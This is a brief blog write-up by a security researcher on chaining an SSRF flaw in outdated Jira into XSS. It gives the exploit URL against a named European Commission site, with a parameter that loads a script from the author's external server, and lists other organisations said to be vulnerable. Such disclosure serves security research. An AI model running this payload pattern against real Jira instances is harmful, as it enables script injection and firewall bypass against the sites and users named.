How I found XSS via SSRF vulnerability -Adesh Kolte

Hello

This is Adesh Nandkishor Kolte

First Read This Articles

How i converted SSRF TO XSS in jira.

Piercing the Veil: Server Side Request Forgery to NIPRNet access

After reading both articles I figure out new way to carry out the XSS attack ,discovered that due to an outdated Jira instance, I was able to exploit an SSRF vulnerability in Jira and was able to perform several actions such as bypass any firewall/protection solutions and etc

so i just tried some basics tricks with google for finding the web apps which used jira integration

got web europa

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=

so i quickly visited

“plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com”

And Boom i got the google page and i m like

i had uploaded xss script on my own Server http://adeshkolte.at.ua/h.html

and pasted it at the place of google.com

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http://adeshkolte.at.ua/h.html

then i found many webs vulnerable for it

Motorola Solution

Mass.gov

Cambridge University Press

Stanford University

Thanks for reading